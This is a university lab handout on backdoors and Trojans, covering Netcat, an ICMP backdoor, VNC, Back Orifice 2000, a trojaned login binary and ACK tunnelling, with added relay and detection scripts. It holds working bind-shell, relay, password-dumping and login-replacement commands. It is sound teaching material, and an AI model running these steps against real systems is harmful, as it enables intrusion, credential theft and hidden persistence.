Lab 6 Trojans and Back Doors (MS Word)

ECE 4112 Internetwork Security
Lab 6: Backdoors and Trojans
Group Number: _________
Member Names: ___________________
_______________________
Date Assigned: October 4, 2005
Date Due: October 11, 2005
Last Edited: November 21, 2005
Please read the entire lab and any extra materials carefully before starting. Be sure to start early
enough so that you will have time to complete the lab. Answer ALL questions in the Answer
Sheet and be sure you turn in ALL materials listed in the Turn-in Checklist on or before the
Date Due.
Goal: In this lab you will learn how backdoors can be used to gain access to a computer.
You will also see how Trojan programs can be used to create these backdoors.
Summary: This lab consists of four parts. In the first part, you will use Netcat to gain
access to a machine. In the second part of the lab, you will examine the properties of a Trojan by
using a software package called Virtual Network Computing (VNC). Next, you will be using a
Trojan program called Back Orifice 2000.
Background:
Read Counter Hack pp. 359-371, 399-422
Good reference website for relays:
http://www.ists.dartmouth.edu/IRIA/knowledge_base/linuxinfo/nc-intro.v0.80.htm
Tasks to be performed:
Create new XP virtual machine
Use Netcat to transfer files and create access to machines.
Edit iptables to open ports through the firewall in Linux host
Create a relay using Netcat.
Use VNC software on windows and Linux.
Use Back Orifice software to control a windows machine
Setup MS Outlook Express in Windows XP
Lab Scenario:
This lab will require you to have a second virtual machine running on your host system. If you
haven’t already made a copy in one of the previous labs, follow the steps below to make one.
Creating a second Windows XP virtual machine
In VMware the virtual machine files are stored in directories in your root directory by default.
You just need to copy all the files from a machine's directory to a new one and then make a new
machine using these files.
In your Red Hat WS 4.0 physical machine's root/vmware directory make a new directory called
winXPProCopy
#cd /root/vmware
#mkdir winXPProCopy
Copy all the files from the winXPPro directory into this new directory.
#cp winXPPro/*.* winXPProCopy/
This will take some time as the image file is quite large.
Start VMware and click File->New->New virtual machine
Choose custom and click Next.
Select the operating system as Windows XP Professional.
Change the name of the new machine to winXPProCopy and change the directory to
/root/winXPProCopy. Click Next. Click Yes at the warning.
Adjust the virtual memory so that you can run all three machines at the same time. Bring it down
to 128 MB for now.
Select Bridged networking and click Next.
Choose “Use an existing virtual disk” and click Next.
Click Browse and choose the file called winXPPro.vmdk in the new directory.
Click Finish.
This will create a new virtual machine on your host system.
You will need to change the ip address of the new WinXP virtual machine. Change it to the old
WinXP machine address + 1. For example, if it was w.x.y.z of the original XP machine, change
it to w.x.y.z+1. To do this:
Start the new virtual machine. If it gives you a warning about low memory just click ok as you
won't be using this machine for too long.
Click Start -> Control Panel
Network and Internet Connections
Network Connections
Right Click on local area connections
Properties
Select TCP/IP
Properties
Make your changes and click OK
Use VMware to stop the machine.
Note: This is only a temporary setup and you probably won't use the second XP machine after
this lab. We’ll call the original machine ‘XP Machine 1’ and the copy ‘XP Machine 2’.
Section 1. Installing and Using Netcat
Note: Netcat for Linux may be obtained from the web at
http://www.atstake.com/research/tools/network_utilities/
Installing Netcat on the Windows machine
Start your main Windows machine (XP 1) and copy the
\\57.35.10.10\secure_class\Tools\Windows directory to your computer. Unzip the nc11nt.zip
program and it should automatically create a directory called nc11nt. Now, whenever you want
to run Netcat, you will have to go into this folder and run it from there (unless you add this
directory to the path).
Now install Netcat on the other XP machine too (XP2).
Installing Netcat on the Linux machine
You should already have a file called netcat.tar.gz in your /home/tools directory. If you don’t,
get it from /mnt/nas4112/Tools/Linux/, after mounting the NAS server. Go into your /home/tools
directory and execute the following commands:
#tar xvfz netcat.tar.gz
#cd netcat
#make linux
#cp nc /usr/local/sbin
The last command will allow you to run Netcat without having to specify this directory.
Using Netcat
The executable program on both operating systems is called nc and the options are the same on
both systems. To run Netcat in client mode so that it sends data across a network, use
#nc [IP Address to send to] [Port to send to]
(e.g. nc a.b.c.d 1234 - This sends data to port 1234 on machine a.b.c.d)
All input is through standard in, so whatever you type on the keyboard will be sent to the other
machine. Alternatively, if you would like to read data from a file and pipe that through to the
other machine, use
#nc [IP address to send to] [Port to send to] < [File to read from]
(e.g. nc a.b.c.d 1224 < testfile.txt - This sends the data in testfile.txt)
To stop Netcat, one simply has to press Ctrl+C.
There are several different options that Netcat can be run with, depending on what it is being
used for. The most common options are:
-l    specifies that Netcat is running in listening mode
-p    specifies which port Netcat should listen on
-v    verbose mode so that all results are displayed
-w    maximum amount of time (in clock ticks) to wait for a response
-z    specifies that Netcat should send very minimal data, usually a SYN (synchronize) packet, to see if a response is obtained
-e    allows Netcat to execute a program to receive or generate network traffic
Look at the README files on both systems under the Netcat folder to find out more information
about running Netcat. Many uses for netcat are found in the readme.
To run Netcat in listen mode, use the -l and -p options. The command syntax would be:
#nc -l -p [port to listen to]
If you want to store the input that is received, you can pipe all the received data to a file, using
the following command:
#nc -l -p [port to listen to] > [file to write to]
(e.g. nc -l -p 1224 > testfile.txt - whatever is received on port 1224 is written to
testfile.txt).
NOTE: If you pipe everything to a file, whatever was previously in that file will be overwritten.
Netcat can also be used to scan ports using the following command (Netcat is being used in
client mode for this):
#echo QUIT | nc -v -w [time to wait] -z [IP address to scan] [port range to scan]
(e.g. echo QUIT | nc -v -w 3 -z a.b.c.d 1-200 - This will scan ports 1 to 200 on the
system with IP address a.b.c.d)
Netcat can also be used to create backdoors on systems. Attackers can push a shell between
systems over any TCP or UDP port. The shell will have the privileges of the user that executes
Netcat in listener mode on the machine being exploited. For example, if you are on the Linux
machine and would like to execute commands on the Windows machine, set up the Netcat
listener on the Windows machine with the following command (from the nc11nt directory):
#nc -l -p [port to listen to] -e cmd.exe
(e.g. nc -l -p 7777 -e cmd.exe - This will pipe all input received on port 7777 to cmd.exe, which
will then execute the commands.)
On the client side, simply type
#nc [listening machine] [port to connect to]
(e.g. nc a.b.c.d 7777)
and start typing in your commands.
A fourth popular use of Netcat is to create relays, whereby an attacker uses several intermediate
systems while actually attacking a target system. Thus, determining where the attack originated
from is a very painful and sometimes impossible process.
Exercise 1.1: Netcat File Transfer
Use Netcat to transfer the password file from your Linux to your Windows machine. Store the
data you receive in passwd.txt. Now try transferring a binary file (e.g. .rtf file) from the
Windows system to the Linux system and then transfer it back to the Windows system, saving it
under a different filename.
Q1.1.1. Is the binary file the same, or has it been altered? Compare the file sizes of the file on
the two systems as it is transferred back and forth.
Q1.1.2. What can you say about Netcat’s ability to transfer binary files?
Exercise 1.2: Netcat Backdoors
This exercise will show you how to use backdoors in Netcat. Create a Netcat backdoor listener
on your Windows machine. Use the options to pipe the output to cmd.exe shell. Select any port
number to listen to and connect to this backdoor by running Netcat in client mode on your Linux
machine. Now type in some simple DOS commands like dir and mkdir. Then try running some
complex commands and examine the extent of information that you can gain from the system.
Q1.1.3. What do you conclude from this?
Exercise 1.3: Netcat Relays
Note: This exercise requires the use of both Windows machines.
In this exercise you will create a relay on your Linux machine using the Netcat listener and
client. This relay will forward data from one windows machine to the other. The Netcat client
will be running on the first XP machine while the listener will be running on the second XP
machine. Once established, the relay should allow you to access the second XP machine from the
original XP machine.
First create a backdoor shell on the new XP machine, using the Netcat listener. You can create a
backdoor shell by
# nc -l -p <listening port> -e cmd.exe
(e.g. nc -l -p 56789 -e cmd.exe)
Creating a relay
A way to create a relay is to tie the input and output of a Netcat listener and client together using
a special file type called a FIFO. As its name implies, a FIFO operates in First-In, First-Out
mode. You can create a FIFO and use it to link a Netcat listener to client by typing the following
in Linux:
# mknod backpipe p
# nc -l -p [portA] 0<backpipe | nc [target computer] [portB] 1>backpipe
portA – Port on which the relay is listening
portB – Port on the target machine on which the backdoor shell is listening
target computer – The target XP machine (XP Machine 2). Make sure its ip is different
from your other XP machine.
Note: Do not put spaces around the '<' or '>' signs. They redirect the standard input and output
streams in Linux into backpipe and cannot have spaces next to them.
e.g. nc -l -p 12345 0<backpipe | nc e.f.g.h 56789 1>backpipe
The line above creates a relay listening on TCP port 12345 and forwards the data to TCP port
56789 of the machine on which the backdoor shell was created.
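As an added example (not part of the lab handout or of the Netcat distribution), the Python script below reproduces the relay's data flow with sockets instead of a FIFO: a listener on portA accepts one client and copies bytes in both directions to the target's portB, which is exactly the job backpipe does between the two nc processes. The "target" here is a constructed stand-in that upper-cases whatever it receives, so the round trip can be checked on localhost; the addresses, ports and function names are assumptions.

```python
"""Socket-based equivalent of the nc/FIFO relay (added example, constructed)."""
import select
import socket
import threading


def pump(a, b):
    """Copy bytes between two connected sockets until either side closes."""
    while True:
        readable, _, _ = select.select([a, b], [], [])
        for src in readable:
            dst = b if src is a else a
            data = src.recv(4096)
            if not data:          # one side hung up: tear the relay down
                return
            dst.sendall(data)


def run_relay(listen_port, target_host, target_port):
    """Listen on portA (0 = ephemeral), relay one client to target:portB.

    Returns the port actually bound so a caller can connect to it.
    """
    lsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    lsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    lsock.bind(("127.0.0.1", listen_port))
    lsock.listen(1)

    def serve():
        client, _ = lsock.accept()
        lsock.close()
        # "nc [target] [portB]" half of the relay
        with client, socket.create_connection((target_host, target_port)) as upstream:
            pump(client, upstream)

    threading.Thread(target=serve, daemon=True).start()
    return lsock.getsockname()[1]


def run_fake_target():
    """Constructed stand-in for the backdoor shell: echoes input upper-cased."""
    tsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tsock.bind(("127.0.0.1", 0))
    tsock.listen(1)

    def serve():
        conn, _ = tsock.accept()
        tsock.close()
        with conn:
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                conn.sendall(data.upper())

    threading.Thread(target=serve, daemon=True).start()
    return tsock.getsockname()[1]


def demo(message=b"dir\n"):
    """Client -> relay -> target and back; returns the target's reply."""
    target_port = run_fake_target()
    relay_port = run_relay(0, "127.0.0.1", target_port)
    with socket.create_connection(("127.0.0.1", relay_port)) as client:
        client.sendall(message)
        return client.recv(4096)


if __name__ == "__main__":
    print(demo())
```

The client never learns the target's address: it only ever talks to the relay host and portA, which is the property that makes tracing through several chained relays so hard.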
For this relay to work, you have to allow packets into the listening port on your Linux machine. If
the default Linux firewall iptables is running, it won’t allow these packets. So disable it by
typing
# /etc/init.d/iptables stop
After creating the relay and listener, connect to the relay by typing
#nc [relay machine] [portA]
on the original XP machine.
Now try some other commands on the target machine and see what all you can do.
Run the command called ipconfig in the shell. This will show you the ip address of the target
machine. Open up another cmd.exe window on your client machine and do ipconfig again to see
the ip address of the machine you’re connecting from. Position these windows so that both the ip
addresses are visible.
Take a screenshot of these windows and submit it with your report. You can use the “Print
Screen” key to capture the screen and then paste it into the paint application.
(Screenshot #1)
Hint: In this exercise, you used Netcat the following four times:
1. As a listener in the relay on your Linux machine
2. As a client in the relay on your Linux machine
3. As a listener, running the shell on the second XP machine
4. As a client on the first XP machine, where commands can be typed to be sent to the
relay.
Q1.1.4. Draw a diagram explaining how the relay works and the directions of data flow.
Exercise 1.4: Other uses of Netcat
Q1.1.5. Aside from the four uses listed in this lab, Netcat can be used in many different ways.
Suggest another way that Netcat could be used (in detail).
Q1.1.6. What defenses could you use against an attack like a netcat backdoor?
Section 2. ICMP-backdoor
In this exercise, we are going to use another backdoor that exploits the ICMP protocol to get a
remote access shell. You should have two RedHat 7.2 virtual machines running to do this
exercise.
If you haven’t already, go ahead and connect to the NAS server and copy the file icmp-backdoor.tar.gz
(from /mnt/nas4112/Tools/Linux) to both of your virtual machines, and extract
the contents with the following command:
# tar zxvf icmp-backdoor.tar.gz
Go into the icmp-backdoor directory. In one virtual machine, we are going to compile the server
part of this program (which shall be referred to as the “Server machine”) with the command:
#make server
In the other virtual machine, we are going to compile the client part of this program (which shall
be referred to as the “Client machine”) with the command:
#make client
You will need to follow the same copy and extract procedures you did with the other Linux
machine.
Next, we are going to start the server program on the Server machine (think of this as installing
the backdoor on an infiltrated machine). To do this, run this command:
#./ibd-server 0
The “0” refers to the ICMP code for “Echo reply” packets. We are setting this server to reply
back with its output in response to “Echo request” packets. This is important in order to make the
connection we want. Refer to Figure 1 to ensure you have run the proper commands up to this
point.
Figure 1. Installing and running the icmp-backdoor server.
Next, run ethereal on your RedHat 4WS machine. When we run commands over this icmp-backdoor connection, we are going to see how data is transferred through the ICMP protocol.
In order to run the client and connect to the icmp-backdoor, run the following command on the
Client machine (where w.x.y.z is the IP address of the Server machine):
#./ibd-client w.x.y.z 8
The “8” refers to the ICMP code for “Echo request” packets. We are setting this client to send
echo request as input to the icmp-backdoor server. If we did this correctly, we will have a
connection established by exploiting the echo-request <-> echo-reply communication of the
ICMP protocol. Refer to Figure 2 to ensure you have run the proper commands up to this point.
Figure 2. Installing and running the icmp-backdoor client.
You should be connected by now… so let’s do stuff. For example, we ran the ls command, and it
shows the directory listing of the Server machine, as shown in Figure 3.
Figure 3. Running ls on the Server machine through the icmp-backdoor client.
While we’re at it, go ahead and run the whoami command just to see what privileges you have.
Okay, now let’s do something slightly more malicious. While we cannot use programs like vi
over this type of connection, we can still run simple commands to retrieve sensitive information.
Let’s see the password file! To do this, run the command “cat /etc/passwd” which should print
out on the client terminal the contents of the password file as shown in Figure 4.
Figure 4. Running cat /etc/passwd to print out the contents of the Server machine’s
password file.
So if we were a hacker, we could just copy the output from this screen to a text file and then run
a password cracker to decipher passwords. Go ahead and have fun running more commands to
see what else can be done over this icmp-backdoor. Once you’ve had your fun, close the
connection by running the exit command on the Client machine.
Now go back and stop your ethereal capture on your RedHat 4WS machine. You should be able to
scroll down and see the ICMP packet exchanges that were made due to the commands you ran.
Highlight one of these packets by clicking on it, and move the bottom scrollbar to see
the contents of the ICMP packet as shown in Figure 5.
Figure 5. Ethereal output showing an ICMP packet due to the backdoor connection.
You should notice that the content of what you saw in your backdoor client is visible in the
actual ICMP packets. Go ahead and take a screenshot of the ethereal output and turn it in with
your lab. Just for your information, there are some developer groups that are trying to enhance
this type of backdoor with encrypting the ICMP contents and hiding the backdoor server’s
process id. That is all for this exercise.
Take a screenshot of the ethereal output (screenshot #2)
Q2.1.1. What defenses could you use against an attack like icmp backdoor?
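As an added example (not part of the lab and not the icmp-backdoor tool's code), the script below shows the detection side of what you just saw in Ethereal: it parses raw ICMP echo packets, verifies the checksum, and flags echo requests and replies whose payload is printable text rather than the fixed patterns the Windows and Linux ping utilities send. The packets it scans are constructed inline, not captured traffic, and the heuristic thresholds are assumptions.

```python
"""Flag ICMP echo packets whose payload looks like shell traffic (added example)."""
import string
import struct

ECHO_REPLY = 0
ECHO_REQUEST = 8
# Payload the Windows ping utility sends (32 bytes).
WINDOWS_PING_PAYLOAD = b"abcdefghijklmnopqrstuvwabcdefghi"


def icmp_checksum(data):
    """RFC 1071 ones'-complement checksum over header plus payload."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo(icmp_type, ident, seq, payload):
    """Build a raw ICMP echo request/reply (used for constructed test input)."""
    header = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", icmp_type, 0, csum, ident, seq) + payload


def parse_icmp(packet):
    """Split a raw ICMP packet into fields; a valid packet checksums to zero."""
    if len(packet) < 8:
        raise ValueError("truncated ICMP header")
    if icmp_checksum(packet) != 0:
        raise ValueError("bad ICMP checksum")
    icmp_type, code, _, ident, seq = struct.unpack("!BBHHH", packet[:8])
    return {"type": icmp_type, "code": code, "id": ident, "seq": seq,
            "payload": packet[8:]}


def _is_incrementing(data):
    """Linux ping follows its timestamp with bytes 0x10, 0x11, 0x12, ..."""
    return len(data) >= 16 and all(
        data[i + 1] == (data[i] + 1) & 0xFF for i in range(len(data) - 1))


def is_standard_ping_payload(payload):
    return payload == WINDOWS_PING_PAYLOAD or _is_incrementing(payload[-32:])


def looks_like_shell_traffic(payload):
    """Heuristic: mostly printable text with whitespace, and not a ping pattern."""
    if not payload or is_standard_ping_payload(payload):
        return False
    text = payload.decode("ascii", errors="replace")
    printable = sum(ch in string.printable for ch in text) / len(text)
    return printable > 0.9 and any(ws in text for ws in ("\n", " "))


def scan(packets):
    """Return (seq, type, payload) for each echo packet carrying text."""
    hits = []
    for pkt in packets:
        fields = parse_icmp(pkt)
        if fields["type"] not in (ECHO_REQUEST, ECHO_REPLY):
            continue
        if looks_like_shell_traffic(fields["payload"]):
            hits.append((fields["seq"], fields["type"], fields["payload"]))
    return hits


def sample_capture():
    """Constructed packets standing in for an Ethereal capture (not real data)."""
    linux_ping = b"\x00" * 16 + bytes(range(0x10, 0x38))   # 16-byte timestamp + pattern
    return [
        build_echo(ECHO_REQUEST, 0x1234, 1, WINDOWS_PING_PAYLOAD),
        build_echo(ECHO_REPLY, 0x1234, 1, WINDOWS_PING_PAYLOAD),
        build_echo(ECHO_REQUEST, 0x0001, 7, linux_ping),
        build_echo(ECHO_REQUEST, 0xBEEF, 2, b"cat /etc/passwd\n"),
        build_echo(ECHO_REPLY, 0xBEEF, 2, b"root:x:0:0:root:/root:/bin/bash\n"),
    ]


if __name__ == "__main__":
    for seq, icmp_type, payload in scan(sample_capture()):
        print(seq, "request" if icmp_type == ECHO_REQUEST else "reply", payload)
```

The same check applied to a live capture is one answer to Q2.1.1: ordinary ping traffic has a predictable payload, so echo packets with anything else in them deserve a look, and a host that should not be pinged at all can simply have ICMP echo blocked.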
Section 3. Installing and Using Virtual Network Computing (VNC)
You can obtain VNC from the web at http://www.realvnc.com/
VNC is an application level Trojan backdoor. It allows remote access to a system, and can be
used for legitimate remote system administration purposes. However, it can also be exploited by
hackers since VNC allows a person to change all configurations that they have permission to
change. Typically, the VNC server is installed on the system that is to be remotely administered
and the client is installed on the administrator’s system. Therefore, if the server was installed by
a user with administrator privileges and is running under that account, an attacker that uses the
VNC server would have full access to all functions of the system.
Installing and Using VNC on the Windows Machine
Copy the file vnc_x86_win32 folder from the NAS server’s tools/Windows folder to the tools
folder on your hard drive.
1. Change into the vnc_x86_win32/winvnc directory and double click the Setup program
2. Click OK on the warning about installation of a previous version.
3. Click Next
4. Click Yes on the License screen
5. Click Next for the default destination location
6. Click Next for the default Program Folder
7. Click Finish
To run the Windows VNC server,
1. From the Start menu, select All Programs ->VNC -> Run WinVNC (App Mode)
2. Enter a password to be used for VNC connections. Remember this password as it will be
required for access to the VNC server by a client. This password prevents other attackers
from using the VNC server
3. Click OK. The server is now waiting on the Windows machine.
To run the Windows VNC client, simply click on “Run VNCviewer”. You will be prompted for
the IP address of the system on which the server is running and the password to access that
server. Once you have entered both, you should see a GUI come up with a terminal window.
Installing and Running VNC on the Linux Machine
Switch to the /home/tools directory, where you extracted all the linux tools, and run the
following command:
#tar xvfz vnc-3.3.3r2_x86_linux_2.0.tgz
Go into the VNC directory that is created. You will see that there are five different executable
programs. Go ahead and read the README file as this will provide you with explanations about
what each of the executables do.
For example, to run the VNC client, simply type
# ./vncviewer
When prompted for the machine of which the server is running, type in the Windows machine’s
IP address. At the next prompt, type in the password. And then you should see a GUI of the
Windows machine appear on the Linux system.
To run the VNC server, you will have to copy the VNC executables into the /usr/local/bin
directory. This puts them in the Linux path. To do this type
#cp vnc* /usr/local/bin
#cp Xvnc /usr/local/bin
Then simply type
#vncserver
Establish a password for the connection and remember this to connect to the Linux machine.
Make sure that after using VNC on the Linux system, you end each VNC process after
completion, otherwise the port that it listens on will be incremented when the next VNC process
is created.
NOTE: To make sure that you can connect to the VNC server running on the Linux system, you
have to modify the iptables rules to allow connections to TCP port 5901, since this is the port that the
VNC server runs on by default. Access to this port is normally blocked (to check this out, run
nmap against the Linux system) by the built-in firewall in Red Hat. Instructions on how to edit the
iptables rules are given below. Note that the change you make to iptables is only temporary and
will be lost the next time you reboot the system.
Modifying IP tables:
To allow packets coming in destined for the VNC server, type:
# iptables --insert INPUT --protocol tcp --destination-port 5901 -j ACCEPT
If you still cannot connect from Windows then you might need to enter the exact port you just
opened in the firewall.
To do this, when you enter the host in VNC viewer, enter host:port
e.g. a.b.c.d:5901
On Windows, you will see another virtual desktop, not the normal user’s desktop and mouse
movements. Still, even though you cannot see what the normal user is doing, you have remote
control of the Linux system from Windows.
Exercise 3.1: Windows VNC Server
Set up a VNC server on your windows machine and connect to it from your Linux machine using
the Linux VNC viewer. Try running a couple of different programs, including the password
cracking software. Since you are logged on as an administrator, you should be able to do
anything.
Q3.1.1. How would you detect that VNC was installed and/or running on your Windows
machine?
Exercise 3.2: Linux VNC Server
Start a VNC server on your Linux machine and try to control it from your Windows machine
using Windows VNC viewer. Run several different programs as well as view the password and
shadow files.
Q3.1.2. How would you detect that VNC was installed on your Linux machine?
Take a screenshot of the VNC client screen (Linux) and another of the VNC viewer
(Windows) accessing the VNC server. Turn these in with your report. (Screenshots #3, #4)
An easy way to take a screenshot in Linux is to press the Print Screen key. A window will come up,
asking you for the name of the file. The format PNG is a standard picture format that can be
printed from your Linux lab printer or a Windows computer.
Q3.1.3 What defenses could you use against an attack like VNC?
Section 4. BO2K BackDoor
Back-Orifice is one of the most well known Trojan/backdoor applications available. It is
important that you do not transfer this file off of these computers and to any ECE machines as
most modern virus scanners will mark this file as malicious.
The Bbo2k_1_0_full file can be copied from the NAS Server under the folder of
Tools\Windows. Copy the file to the desktop of one of your Windows XP virtual machines.
Double click on the program and then run through the installation process.
After installing, open the program “BO2k Configuration Tool”. Click next through the initial
startup screen. The next screen allows you to rename the server, you can just keep it named
“bo2k.exe” for this lab. The next screen determines whether to use TCP or UDP; just leave it as
TCP. Select a port number to run on the next screen (select something over 1024, e.g. 30000).
Click next through the next screen. Enter a passphrase on the next screen; since we chose “XOR”,
just choose something like “ece4112”. Now finish the configuration wizard.
Now the real configuration program opens. Click “Open server” and select the file name
“bo2k.exe”. Now click “Save Server”. And exit the program.
Now this bo2k.exe file needs to be transferred to the victim machine using the shared folders
available through VMWare tools. To do this:
1. Right-click on the WinXP virtual machine tab in VMWare and click Settings. Now click
on the Options tab. Click on Shared Folders and make sure that it is enabled. If it isn’t,
check the Enable Shared Folders checkbox. Now click Add… near the bottom of the
window and select the folder which you want to share (suggestion: you might want to
create and share a directory called root/vmware/shared). Enter a name for the shared
resources (“Shared Folder”).
2. Repeat the above for the XPPro Copy machine.
3. Now open My Computer in the XPPro machine and click Tools->Map Network Drive.
4. Use the default drive letter for “Drive:” and click Browse to locate the shared folder.
5. Expand VMWare Shared Folder and select the folder which you shared in step 1.
6. Repeat step 4 for the XP Copy machine.
Now, anything copied to the network drive will be available to both machines.
On the victim's machine, double click the bo2k.exe file you transferred. You have now installed
the backdoor on the victim machine. Go back to the Windows copy virtual machine.
On the non-server machine open the BO2k client program. Click file->new server and fill in the
IP address of your target machine and connect to it. Play around with some of the tools now
available to you. Have BO2k list the password hashes for the victim machine and take a screen
shot of this.
Screenshot #5: Submit a screenshot of BO2k successfully being used to gain access to the
password hashes of the victim machine.
Another such tool to control a remote XP machine is “Let Me Rule” (http://www.pinoyhaker.net/modules.php?name=Downloads&d_op-viewdownload&cid=1#cat). This program
packages a lot of the individual tools that we have played with, including a video stream, key
logger and an FTP server.
Section 5: Using a Simple Backdoor Program in C
Suppose you want to install a backdoor on a compromised Linux machine. This nifty C program
(utrojan.c – see source code below) allows you to hijack login, imapd and/or qpopd. For this
exercise, we’ll overwrite login and access the victim machine via telnet.
The program can be obtained from:
http://packetstormsecurity.org/UNIX/penetration/rootkits/utrojan.c
This program overwrites the /bin/login command. While telneting to a victim machine, it
provides a “1 second time frame” in which you need to enter the password “door”. If you enter
this correctly, it executes /bin/sh, thereby giving you root access (from any user account installed
on the compromised machine). If you don’t enter in “door” correctly, within the time frame, the
program defaults to the original login script, saved as /bin/.login.
Make sure that telnet is running on the RH7.2 machine.
On the RH7.2 (victim machine):
1. Copy utrojan.c from the Lab6 folder on the NAS to /bin directory
2. Go to /bin directory and back up the login file
# mv login .login
3. Compile utrojan.c
# gcc -o login utrojan.c
On a WinXP machine:
1. Open the command line
2. Telnet into the RH7.2 machine (you may need to start telnet by using ntsysv on the RH7.2
machine and rebooting):
C:\> telnet <ip address>
3. Within 1 second, type “door” and press enter
4. You should see the # prompt
5. Type whoami (you should be root)
Take a screenshot of this remote access. (#6)
On your RH7.2 machine move the backup .login file back to login to stop this backdoor.
Section 6: Backdoor Detection
In the previous sections, we looked at tools that install backdoors on systems. We asked you how
you would detect these backdoors. One probable answer is to look for suspicious ports that are
listening for connections. How can we do this? There are two Windows tools, TCPView
(http://www.softpedia.com/public/cat/10/7/10-7-12.shtml) and Active Ports, that do exactly that.
Download the executable installer for TCPView from the NAS to one of your Windows XP
machines.
Extract the zip file. Click on Tcpview.exe. Take note of the processes running, the protocols they
use, the local and remote addresses, and the state.
Now run the Netcat listener by opening a command prompt and typing:
nc -l -p 7777 -e cmd.exe
Look back to TCPView. You should see a new process “nc.exe:xxxx”. The local address should
be xp:7777 and the state should be listening.
Take a screenshot (#7)
Now right click on the nc.exe process in TCPView and select “Process properties…” You should
see a pop up box with the path on the nc.exe program and also the command line arguments used
to execute the program.
Take a screenshot (#8)
To end a malicious process, right click on it and select “End Process….” You have just closed a
backdoor.
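As an added example (not part of the lab), the script below does programmatically what you just did by hand in TCPView: it parses netstat -ano style output, maps each listener's PID to its image name as tasklist would report it, and flags listeners that are outside an expected baseline or belong to one of the backdoor tools used in this lab. The netstat lines, task list and baseline are constructed sample data, not output from a real host.

```python
"""Flag unexpected listening sockets from netstat-style output (added example)."""
import re

# Constructed baseline of ports this host is expected to listen on.
BASELINE_LISTENERS = {135, 139, 445, 500}
# Executables of the backdoor tools used in this lab (a site list would be longer).
KNOWN_BACKDOOR_IMAGES = {"nc.exe", "bo2k.exe", "ackcmds.exe"}

# Constructed sample of `netstat -ano` output (not captured from a real host).
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       812
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:7777           0.0.0.0:0              LISTENING       1480
  TCP    192.0.2.10:1042        192.0.2.20:80          ESTABLISHED     1900
  UDP    0.0.0.0:500            *:*                                    620
"""
# Constructed PID -> image map, as `tasklist` would report it.
SAMPLE_TASKLIST = {812: "svchost.exe", 4: "System", 1480: "nc.exe",
                   1900: "iexplore.exe", 620: "lsass.exe"}

# proto, local addr:port, foreign addr, optional state (UDP has none), PID
ROW = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+)\s+(?:(\S+)\s+)?(\d+)\s*$")


def parse_netstat(text):
    """Return one dict per socket row; header and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if not m:
            continue
        proto, laddr, lport, faddr, state, pid = m.groups()
        rows.append({"proto": proto, "local_addr": laddr, "local_port": int(lport),
                     "foreign": faddr, "state": state or "", "pid": int(pid)})
    return rows


def find_suspicious_listeners(rows, pid_to_image, baseline=BASELINE_LISTENERS):
    """Listeners not in the baseline, or owned by a known backdoor image."""
    findings = []
    for row in rows:
        if row["proto"] == "TCP" and row["state"] != "LISTENING":
            continue                      # established/outbound sockets are not listeners
        image = pid_to_image.get(row["pid"], "<unknown>")
        reasons = []
        if row["local_port"] not in baseline:
            reasons.append("port not in baseline")
        if image.lower() in KNOWN_BACKDOOR_IMAGES:
            reasons.append("known backdoor image")
        if reasons:
            findings.append({"port": row["local_port"], "pid": row["pid"],
                             "image": image, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_listeners(parse_netstat(SAMPLE_NETSTAT), SAMPLE_TASKLIST):
        print(f)
```

A baseline is what turns a listing into a detection: TCPView shows every listener, but only a comparison against what the host is supposed to offer makes xp:7777 stand out, and an attacker can rename nc.exe, so the port check matters more than the image name check.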
Section 7: Walkthrough Firewalls with Ack Tunneling
In an effort to maintain access to exploited boxes, hackers install backdoors. You have already
seen how a shell can be tunneled over ICMP messages. However, virtually all sysadmins have
blocked ICMP at their firewalls. Assuming you have access to the firewall rule set, you could
install a regular TCP server daemon and open a hole in the firewall. But such a hole can easily be
detected when a sysadmin scans his network. Fortunately, there is an alternative: ACK tunneling.
ACK tunneling does exactly what you would expect: it tunnels network traffic over TCP ACK
packets. The key advantage of this is that a stateless firewall allows any packet with the ACK flag
set, as it assumes such packets belong to a pre-existing connection. This allows us to send the
ACK packets right through the firewall and make a connection with the backdoor. Note that this
will not work on stateful firewalls, as stateful firewalls keep the state of the active connections.
Fortunately, most firewalls are stateless. Stateless firewalls include the Windows firewall, most
router/switch firewall boxes, and many high-traffic firewalls, as statefulness is CPU-intensive.
Another advantage of ACK tunneling is that you can ACK scan with nmap through a firewall
and find all of the infected machines behind the firewall. So, for example, if you can get the
server installed on a bunch of targets in a company via an e-mail worm, then a simple nmap
ACK scan of the company from outside the firewall will show all the infected machines. This
has the advantage of not needing a callback in the server, which could reveal the attacker's identity.
Lastly, most firewall logging systems only log SYNs, so our ACK traffic will not be
logged.
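As an added example (not part of the lab), the model below shows why the stateless/stateful distinction above decides whether the tunnel works: a stateless filter admits any inbound packet carrying ACK and logs only SYNs, while a stateful filter admits a non-SYN packet only if it matches a flow in its connection table. The filter classes, the documentation-range addresses and the port 80 to port 1054 tunnel packet are constructed for the demonstration.

```python
"""Stateless vs. stateful filtering of a bare ACK (added example, constructed)."""
from collections import namedtuple

# flags is a set of TCP flag names, e.g. {"SYN"} or {"SYN", "ACK"}
Packet = namedtuple("Packet", "src sport dst dport flags")


class StatelessFilter:
    """Admits inbound SYNs only to allowed ports; trusts any ACK; logs only SYNs."""

    def __init__(self, allowed_inbound_ports):
        self.allowed = set(allowed_inbound_ports)
        self.log = []

    def outbound(self, pkt):
        return True                      # no memory of what left the network

    def inbound(self, pkt):
        if "ACK" in pkt.flags:
            return True                  # assumed to belong to an existing flow
        if "SYN" in pkt.flags:
            self.log.append(("SYN", pkt.src, pkt.dport))
        return pkt.dport in self.allowed


class StatefulFilter:
    """Admits replies only for flows it saw being opened."""

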